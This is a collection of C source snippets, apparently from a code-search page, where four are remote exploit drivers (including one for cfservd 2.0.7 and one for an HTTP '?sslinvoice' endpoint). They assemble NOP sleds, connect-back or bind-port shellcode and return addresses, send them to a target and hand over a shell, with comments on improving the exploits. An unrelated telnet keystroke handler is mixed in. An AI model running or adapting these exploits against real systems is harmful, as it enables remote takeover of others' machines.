コード例 #1
ファイル: 13537_0.c プロジェクト: B-Rich/osf_db
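/*
 * Emit an exploit payload on stdout: a 200-byte NOP sled, the shellcode in
 * `cb` (patched in place with the callback IP and port), then the 4-byte
 * address at `addys+ADDY` repeated until the buffer holds POE bytes.
 *
 * The payload is written as a C string (strlen), exactly as before, so a
 * NUL byte inside `cb` would still truncate the output.
 *
 * Fix over the original: every store into `buff` is now bounded by
 * sizeof buff.  The original trusted POE and the length of `cb` to fit in
 * 416 bytes without checking either.
 *
 * IP, PORT, PORT_OFFSET, POE, ADDY, cb, addys, changeip() and changeport()
 * are defined elsewhere in this file.
 */
int main (void) {
        char buff[416];
        size_t a = 0;

        changeip(IP);
        changeport(cb, PORT, PORT_OFFSET);

        /* NOP sled; leave one byte for the terminating NUL */
        for (; a < 200 && a < sizeof buff - 1; a++)
                buff[a] = 0x90;

        /* shellcode, copied up to (not including) its NUL terminator */
        for (size_t b = 0; cb[b]; a++, b++) {
                if (a >= sizeof buff - 1) {
                        fputs("payload does not fit in buffer\n", stderr);
                        return 1;
                }
                buff[a] = cb[b];
        }

        /* pad with the return address, 4 bytes at a time, up to POE */
        for (; a + 4 <= POE && a + 4 <= sizeof buff - 1; a += 4)
                memcpy(buff + a, addys + ADDY, 4);

        buff[a] = 0;

        if (fwrite(buff, 1, strlen(buff), stdout) != strlen(buff))
                return 1;
        return 0;
}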
コード例 #2
ファイル: 123.c プロジェクト: 0x24bin/exploit-database
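/*
 * Exploit driver (Win32).  Fills `buff` with NOPs, writes a run of return
 * addresses at `align` and a shellcode stub (bind-port or connect-back) at
 * `retsize + sc_offset`, delivers it with do_send(), then either waits for
 * the target to connect back ('-l') or polls the target's bind port until a
 * shell answers.  Shell I/O is handed to doshell().
 *
 * Fixes over the original:
 *  - `retaddr` was only assigned inside the '-t' case, so running with the
 *    default target copied an uninitialised long into the buffer; it is now
 *    resolved once after option parsing;
 *  - the return-address run is bounds-checked against BSIZE *before* it is
 *    written (the original only checked the shellcode placement, and only
 *    after the address loop had already run);
 *  - getopt()'s result is kept in an int so the EOF comparison is correct
 *    where char is unsigned;
 *  - `sockadd` is zeroed so sin_zero is not garbage.
 *
 * targets[], buff, BSIZE, NOP, the *_SIZE/*_OFFSET defaults, changeip(),
 * changeport(), do_send(), resetalarm(), doshell(), usage(), banner(),
 * showtargets() and err_exit() are defined elsewhere in the file.
 */
int main(int argc, char *argv[]) {

	int opt;
	char *host=NULL, *ptr, *ip="";
	struct sockaddr_in sockadd;
	int i, i_len, ok=0, mode=0, flag=0;
	int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
	int target=TARGET, scsize=SC_SIZE_1, port=PORT;
	int timeout=TIME_OUT, interval=INTERVAL;
	int retbytes;
	long retaddr;

	WSADATA wsd;
	SOCKET s1, s2;

	memset(&sockadd,0,sizeof(sockadd));

	if (argc<2) { usage(argv[0]); }

	while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
		switch(opt) {
			case 'a':
			align=atoi(optarg);
			break;

			case 'I':
			interval=atoi(optarg);
			break;

			case 'T':
			timeout=atoi(optarg);
			break;

			case 't':
			target=atoi(optarg);	/* resolved to retaddr below */
			break;

			case 'i':
			ip=optarg;
			changeip(ip);
			break;

			case 'l':
			mode=1;
			scsize=SC_SIZE_2;
			break;

			case 'r':
			retsize=atoi(optarg);
			break;

			case 's':
			sc_offset=atoi(optarg);
			break;

			case 'h':
			ok=1;
			host=optarg;
			sockadd.sin_addr.s_addr=inet_addr(optarg);
			break;

			case 'p':
			port=atoi(optarg);
			break;

			case 'H':
			showtargets();
			break;

			default:
			usage(argv[0]);
			break;
		}
	}

	if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }

	/* Targets are numbered from 1 on the command line.  The length of
	 * targets[] is declared elsewhere in this file and is not visible here,
	 * so only the lower bound can be checked at this point. */
	if (target<1) err_exit("-> Bad target number....");
	retaddr=targets[target-1].jmpesp;

	/* The address loop advances in 4-byte steps, so it writes retsize
	 * rounded up to a multiple of 4. */
	retbytes=(retsize+3)&~3;
	if (align<0 || retsize<0 || sc_offset<0 || align+retbytes>BSIZE) {
		err_exit("-> Bad 'align'/'retsize'..");
	}
	if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");

	memset(buff,NOP,BSIZE);

	ptr=buff+align;
	for(i=0;i<retsize;i+=4) {
		memcpy(ptr,&retaddr,4);	/* low 4 bytes; little-endian x86 assumed */
		ptr+=4;
	}

	if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
		err_exit("-> WSAStartup error....");
	}

	if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
		err_exit("-> socket() error...");
	}
	sockadd.sin_family=AF_INET;
	sockadd.sin_port=htons((SHORT)port);

	ptr=buff+retsize+sc_offset;

	banner();

	if (mode) {

		printf("-> 'Listening' mode...( port: %d )\n",port);

		/* connect-back stub: patched with our port, then copied in */
		changeport(connback, port, PORT_OFFSET_2);
		for(i=0;i<scsize;i++) { *ptr++=connback[i]; }

		do_send(host,timeout);
		Sleep(1000);

		sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
		i_len=sizeof(sockadd);

		if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
			err_exit("-> bind() error");
		}

		if (listen(s1,0)<0) {
			err_exit("-> listen() error");
		}

		printf("-> Waiting for connection...\n");

		s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);

		if (s2<0) {
			err_exit("-> accept() error");
		}

		printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));

		resetalarm();
		doshell(s2);

	}
	else {

		printf("-> 'Connecting' mode...\n");

		/* bind-port stub: the shell listens on `port` on the target */
		changeport(bindport, port, PORT_OFFSET_1);
		for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }

		do_send(host,timeout);
		Sleep(1000);

		printf("-> Will try connecting to shell now....\n");

		/* retry every `interval` seconds until connect() succeeds */
		i=0;
		while(!flag) {
			Sleep(interval*1000);
			if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
				printf("-> Trial #%d....\n",i++);
			}
			else { flag=1; }
		}

		printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);

		resetalarm();
		doshell(s1);

	}

	return 0;

}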
コード例 #3
ファイル: 23183.c プロジェクト: 0x24bin/exploit-database
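/*
 * Exploit driver for cfservd.  Builds a `buffsize`-byte request in `buf`
 * laid out as: HDR_SIZE+align header bytes, NOP filler, a shellcode stub
 * (bind-port or connect-back), and a run of return addresses.  It then
 * connects to t_port, sends the buffer and either accepts the target's
 * connect-back on s_port ('-l') or connects to the shell bound on s_port.
 *
 * Fixes over the original:
 *  - the layout is checked against `buffsize` before anything is written.
 *    The original computed the NOP count as whatever was left over and, when
 *    that went negative (large align/retsize/scsize), silently wrote past
 *    the end of `buf`;
 *  - the address loop steps 4 bytes at a time, so `retsize` is rounded up
 *    in the size computation instead of overrunning by up to 3 bytes;
 *  - fork() failure is detected and wait() is called with an argument;
 *  - getopt()'s result is kept in an int so the EOF comparison is correct
 *    where char is unsigned.
 *
 * RET_ADDR, HDR, HDR_SIZE, NOP, the *_SIZE/*_OFFSET/*_PORT defaults,
 * bindport, connback, changeip(), changeport(), sigalrm(), sendcmd(),
 * doshell(), usage() and err_exit() are defined elsewhere in the file.
 */
int main(int argc, char *argv[]) {

	int opt;
	char *buf, *ptr, *ip="";
	struct sockaddr_in sockadd;
	int i, s1, s2, i_len, ok=0, mode=0;
	int time_out=TIME_OUT, scsize=SC_SIZE_1;
	int s_port=S_PORT, t_port=T_PORT, offset=RET_OFFSET;
	int retsize=RET_SIZE, align=ALIGN, buffsize=BUFF_SIZE;
	int retbytes, nops;
	long ret_addr;
	pid_t pid;

	memset(&sockadd,0,sizeof(sockadd));

	if (argc<2) { usage(argv[0]); }

	while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) {
		switch(opt) {
			case 'i':
			ip=optarg;
			changeip(ip);
			break;

			case 'l':
			mode=1;
			scsize=SC_SIZE_2;
			break;

			case 'T':
			time_out=atoi(optarg);
			break;

			case 'b':
			buffsize=atoi(optarg);
			break;

			case 'a':
			align=atoi(optarg);
			break;

			case 'h':
			ok=1;
			sockadd.sin_addr.s_addr = inet_addr(optarg);
			break;

			case 'r':
			retsize=atoi(optarg);
			break;

			case 't':
			t_port=atoi(optarg);
			break;

			case 's':
			s_port=atoi(optarg);
			break;

			case 'o':
			offset=atoi(optarg);
			break;

			default:
			usage(argv[0]);
			break;
		}
	}

	if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); }

	/* The address loop below writes retsize rounded up to a multiple of 4;
	 * the NOP filler is whatever remains of buffsize after the fixed parts.
	 * Refuse rather than overrun when nothing remains. */
	retbytes=(retsize+3)&~3;
	if (align<0 || retsize<0 || buffsize<0 ||
	    HDR_SIZE+align+scsize+retbytes>buffsize) {
		err_exit("-> Payload does not fit in 'buffsize'");
	}
	nops=buffsize-HDR_SIZE-align-scsize-retbytes;

	/* +1 for the terminating NUL written after the address run */
	if (!(buf=malloc(buffsize+1))) {
		err_exit("-> malloc() error");
	}

	ret_addr=RET_ADDR-offset;
	fprintf(stdout,"\nCfservd Remote Exploit by snooq [ [email protected] ]\n");
	fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n");
	fprintf(stdout,"-> Using return address of 0x%08lx\n", ret_addr);

	ptr=buf;
	for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; }
	for(i=0;i<nops;i++) { *ptr++=NOP; }
	if (mode) {
		changeport(connback, s_port, PORT_OFFSET_2);
		for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
	}
	else {
		changeport(bindport, s_port, PORT_OFFSET_1);
		for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
	}
	for(i=0;i<retsize;i+=4) {
		memcpy(ptr,&ret_addr,4);	/* low 4 bytes; little-endian x86 assumed */
		ptr+=4;
	}
	*ptr++=0;

	sockadd.sin_family = AF_INET;
	sockadd.sin_port = htons(t_port);

	if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
		err_exit("-> socket error");
	}

	if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
		err_exit("-> connect() error");
	}

	if (mode) {

		fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port);

		/* child sends the payload after a short delay while the parent
		 * sets up the listener for the connect-back */
		if ((pid=fork())<0) {
			err_exit("-> fork() error");
		}

		if (pid==0) {
			sleep(2);
			if (send(s1,buf,buffsize,0)<0) {
				err_exit("-> send() error");
			}
			fprintf(stdout,"-> Exploit string sent....\n");
			exit(0);
		}

		else {

			signal(SIGALRM,sigalrm);
			alarm(time_out);

			if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) {
				err_exit("-> socket error");
			}

			memset(&sockadd,0,sizeof(sockadd));
			sockadd.sin_family = AF_INET;
			sockadd.sin_port = htons(s_port);
			sockadd.sin_addr.s_addr = htonl(INADDR_ANY);
			i_len=sizeof(sockadd);

			if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) {
				err_exit("-> bind() error");
			}

			if (listen(s2,0)<0) {
				err_exit("-> listen() error");
			}

			wait(NULL);
			close(s1);
			fprintf(stdout,"-> Waiting for connection....\n");

			s1=accept(s2,(struct sockaddr *)&sockadd,&i_len);

			if (s1<0) {
				err_exit("-> accept() error");
			}

			alarm(0);

			fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr));

			sendcmd(s1);
			doshell(s1);

		}

	}

	else {

		if (send(s1,buf,buffsize,0)<0) {
			err_exit("-> send() error");
		}

		close(s1);

		fprintf(stdout,"-> 'Connecting' mode...\n");
		fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n");
		sleep(2);

		/* sin_addr still holds the -h target; only the port changes */
		sockadd.sin_family = AF_INET;
		sockadd.sin_port = htons(s_port);

		if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
			err_exit("-> socket() error");
		}

		if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
			fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n");
			exit(0);
		}

		fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port);

		sendcmd(s1);
		doshell(s1);

	}

	free(buf);
	return(0);

}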
コード例 #4
ファイル: linemode.c プロジェクト: macssh/macssh
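/*
 * Handle one keystroke for a telnet window running in LINEMODE.
 *
 * Precedence, top to bottom:
 *   1. a pending "literal next" (tw->litNext) passes the key through raw;
 *   2. TRAPSIG (lmodeBits & 2) turns the IP/SUSP/ABORT/BRK characters from
 *      tw->slc[] into IAC sequences, honouring the FLUSHIN/FLUSHOUT levels;
 *   3. SOFT_TAB expands a tab into spaces;
 *   4. EDIT mode handles the local editing characters and buffers anything
 *      else with kbwrite();
 *   5. otherwise the byte goes straight to the net (bare CR as CR NUL).
 * Local echo, when tw->echo is set, goes through parse().
 *
 * Fixes over the original:
 *  - a literal-next key now returns unconditionally.  Before, with echo
 *    off, it fell through and was processed a second time, which could
 *    buffer it twice or trigger TRAPSIG on the very key the user escaped;
 *  - erase-char and erase-word no longer drive tw->kblen below zero or read
 *    tw->kbbuf[-1] on an empty line buffer.
 */
void process_key(unsigned char ascii,struct WindRec *tw)
{
	if (tw->litNext) {
		/* Literal next: no interpretation at all, just buffer (and echo). */
		tw->litNext = FALSE;
		kbwrite(tw, &ascii, 1);
		if (tw->echo && ascii>31 && ascii<127)
			parse(tw, &ascii, 1);
		return;
	}

	if (tw->lmodeBits & 2) {
		/* TRAPSIG: map signal characters to their telnet commands. */
		unsigned char toSend[2] = {IAC,0};
		short whichSignal = 0;

		if (ascii == tw->slc[SLC_IP]) {
			whichSignal = SLC_IP;
			toSend[1] = TEL_IP;
		} else if (ascii == tw->slc[SLC_SUSP]) {
			whichSignal = SLC_SUSP;
			toSend[1] = TEL_SUSP;
		} else if (ascii == tw->slc[SLC_ABORT]) {
			/* parse.h defaults send ABORT on ^\ -- change it there, not here */
			whichSignal = SLC_ABORT;
			toSend[1] = TEL_ABORT;
		} else if (ascii == tw->slc[SLC_BRK]) {
			whichSignal = SLC_BRK;
			toSend[1] = TEL_BREAK;
		}

		if (toSend[1]) {
			tw->kblen=0;	/* discard the pending line */
			netpush(tw->port);
			netwrite(tw->port,toSend,2);
			if (tw->slcLevel[whichSignal] & SLC_FLUSHIN) {
				/* IAC DM sent as urgent data */
				unsigned char dm[2] = {IAC,TEL_DM};
				netpush(tw->port);
				netUrgent();
				netwrite(tw->port,dm,2);
			}
			if (tw->slcLevel[whichSignal] & SLC_FLUSHOUT) {
				/* DO TIMING-MARK; tw->timing makes us wait for the WILL */
				unsigned char tm[3] = {IAC,TEL_DOTEL,N_TIMING};
				tw->timing = 1;
				netpush(tw->port);
				netwrite(tw->port,tm,3);
			}
			return;
		}
	}

	if ((tw->lmodeBits & L_SOFT_TAB) && (ascii == 0x09)) {
		/* SOFT_TAB: buffer spaces up to the next tab stop, echo the tab */
		short numSpaces = VSIgetNextTabDistance();
		unsigned char spacechar = ' ';
		while (numSpaces-- > 0)
			kbwrite(tw, &spacechar, 1);
		if (tw->echo)
			parse(tw, &ascii, 1);
		return;
	}

	if (tw->lmodeBits & L_EDIT) {
		if (ascii == '\015') {
			/* CR ends the line: flush the buffer, then send CR LF */
			kbflush(tw);
			netpush(tw->port);
			netwrite(tw->port,"\015\012",2);
			if (tw->echo)
				parse(tw,(unsigned char *) "\012\015",2);
			return;
		}

		if (ascii == tw->slc[SLC_EC]) {
			/* erase character; nothing to erase on an empty buffer */
			if (tw->kblen > 0) {
				if (tw->echo)
					parse(tw,(unsigned char *) "\010 \010",3);
				tw->kblen--;
			}
			return;
		}
		else if (ascii == tw->slc[SLC_AO] || ascii == tw->slc[SLC_EL]) {
			/* both are handled as "kill the line" here */
			while (tw->kblen > 0) {
				if (tw->echo)
					parse(tw,(unsigned char *) "\010 \010",3);
				tw->kblen--;
			}
			return;
		}
		else if ((ascii == tw->slc[SLC_EOF]) && (tw->lmodeBits & 2)) {
			/* EOF only under TRAPSIG: flush the buffer, then IAC EOF.  The
			 * ^D itself is deliberately not left in the key buffer: on *BSD it
			 * could resurface on a later flush and log the session out. */
			char eofString[2] = { IAC, TEL_EOF };
			kbflush(tw);
			netpush(tw->port);
			netwrite(tw->port,eofString, 2);
			return;
		}
		else if (ascii == tw->slc[SLC_EW]) {
			/* erase word: back up to the previous space, never past the start */
			while (tw->kblen > 0 && tw->kbbuf[tw->kblen-1] != 0x20) {
				if (tw->echo)
					parse(tw,(unsigned char *)"\010 \010",3);
				tw->kblen--;
			}
			/* NOTE(review): unlike the other editing keys this branch does not
			 * return, so the key is also echoed as ^X below -- confirm intended. */
		}
		else if (ascii == tw->slc[SLC_RP]) {
			VSredrawLine(tw->vs);
			return;
		}
		else if (ascii == tw->slc[SLC_LNEXT]) {
			tw->litNext = TRUE;
			return;
		}
		else if (ascii == tw->slc[SLC_XON]) {
			if (tw->allow_flow) {	/* remote flow control may disable this */
				tw->enabled = 1;
				changeport(scrn, scrn);
			}
			return;
		}
		else if (ascii == tw->slc[SLC_XOFF]) {
			if (tw->allow_flow) {
				tw->enabled = 0;
				changeport(scrn, scrn);
			}
			return;
		}
		else if ((ascii == tw->slc[SLC_FORW1])||(ascii == tw->slc[SLC_FORW1])) {
			/* NOTE(review): the second test repeats SLC_FORW1; the second
			 * forwarding character was presumably meant -- confirm which SLC_*
			 * index the slc table defines for it before changing this. */
			kbflush(tw);
			netwrite(tw->port,&ascii,1);
			return;
		}
		else {
			/* not an editing key: add it to the line buffer */
			kbwrite(tw, &ascii, 1);
		}
	}
	else if (ascii == '\015') {
		/* not editing: a bare CR is sent as CR NUL (0x0D 0x00) */
		unsigned char toSend[2] = {0x0D,0x00};
		netpush(tw->port);
		netwrite(tw->port,toSend,2);
		if (tw->echo)
			parse(tw,(unsigned char *) "\012\015",2);
		return;
	}
	else {
		/* not editing: send the byte as-is */
		netpush(tw->port);
		netwrite( tw->port, &ascii, 1);
	}

	if (tw->echo) {
		/* local echo: printable as-is, controls as ^X unless LIT_ECHO */
		if (ascii>31 && ascii <127)
			parse(tw, &ascii, 1);
		else if (!(tw->lmodeBits & L_LIT_ECHO)) {
			ascii='@'+ascii;
			parse(tw,(unsigned char *) "^",1);
			parse(tw, &ascii, 1);
		}
	}
}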
コード例 #5
ファイル: 18222_0.c プロジェクト: B-Rich/osf_db
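/*
 * Exploit driver: connect to host:port, send an HTTP GET for
 * `location?sslinvoice` whose body is a 4000-byte NOP sled, the
 * connect-back shellcode `cb` (patched with the -1/-2 callback IP and
 * port), 128 copies of the 32-bit return address `offset`, and "Submit".
 *
 * Fixes over the original:
 *  - the payload layout is checked against sizeof buff before anything is
 *    written (the original assumed sizeof(cb) was small enough);
 *  - the request header is built with snprintf() so a long -l or -i
 *    argument cannot overrun buff;
 *  - getopt()'s result is kept in an int so the -1 comparison terminates
 *    where char is unsigned;
 *  - send() results are checked and the socket is closed on exit.
 *
 * OFFSET, PORT, CB_PORT, PORT_OFFSET, cb, changeip(), changeport() and
 * help() are defined elsewhere in the file.
 */
int main (int argc, char **argv) {
        int sock, opt, hdrlen;
        unsigned offset = OFFSET, ipaddr, i;
        unsigned short port = PORT, cbport = CB_PORT;
        struct sockaddr_in server;
        char *host = NULL, *location = NULL, *cbip = NULL, buff[5120];
        /* Body layout: sled, shellcode without its NUL, 128 x 4-byte return
         * address, then "Submit".  The "\n" that strcpy() appends is not
         * counted in the body length, exactly as in the original. */
        const size_t sled = 4000, sclen = sizeof(cb) - 1, retlen = 128 * 4;
        const size_t bodylen = sled + sclen + retlen + strlen("Submit");

        while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) {
                switch (opt) {
                        case 'i': host = optarg; break;
                        case 'p': sscanf(optarg, "%hu", &port); break;
                        case 'o': sscanf(optarg, "%x", &offset); break;
                        case 'l': location = optarg; break;
                        case '1': cbip = optarg; break;
                        case '2': sscanf(optarg, "%hu", &cbport); break;
                        default: break;
                }
        }

        if (!(host && location && cbip)) {
                puts("-!> a required argument was missing\n");
                help();
                exit(1);
        }

        /* strcpy() below writes "Submit\n" plus a NUL at sled+sclen+retlen */
        if (sled + sclen + retlen + sizeof("Submit\n") > sizeof buff) {
                puts("-!> shellcode too large for the payload buffer");
                exit(1);
        }

        changeip(cbip);
        changeport(cb, cbport, PORT_OFFSET);

        if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
                printf("socket() error: %s\n", strerror(errno));
                exit(1);
        }

        memset(&server, 0, sizeof server);
        server.sin_family = AF_INET;
        server.sin_port = htons(port);

        /* dotted quad first, hostname lookup as the fallback */
        if ((ipaddr = inet_addr(host)) == INADDR_NONE) {
                struct hostent *myhost = gethostbyname(host);
                if (myhost == 0 || myhost->h_length != (int) sizeof server.sin_addr) {
                        printf("-!> failed to resolve host '%s'\n", host);
                        exit(1);
                }
                memcpy(&server.sin_addr, myhost->h_addr, sizeof server.sin_addr);
        }
        else server.sin_addr.s_addr = ipaddr;

        if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) {
                printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno));
                exit(1);
        }

        hdrlen = snprintf(buff, sizeof buff,
                          "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n",
                          location, host, (unsigned) bodylen);
        if (hdrlen < 0 || (size_t) hdrlen >= sizeof buff) {
                puts("-!> request header too long");
                exit(1);
        }
        if (send(sock, buff, (size_t) hdrlen, 0) != hdrlen) {
                printf("-!> send() failed: %s\n", strerror(errno));
                exit(1);
        }

        /* reuse buff for the body now that the header is on the wire */
        for (i = 0; i < sled; i++) buff[i] = 0x90;
        for (unsigned a = 0; a < sclen; i++, a++) buff[i] = cb[a];
        for (unsigned a = 0; a < 128; i += 4, a++)
                memcpy(buff + i, &offset, 4);   /* host byte order: x86 assumed */
        strcpy(buff + i, "Submit\n");

        if (send(sock, buff, bodylen, 0) != (ssize_t) bodylen) {
                printf("-!> send() failed: %s\n", strerror(errno));
                exit(1);
        }

        close(sock);
        return 0;
}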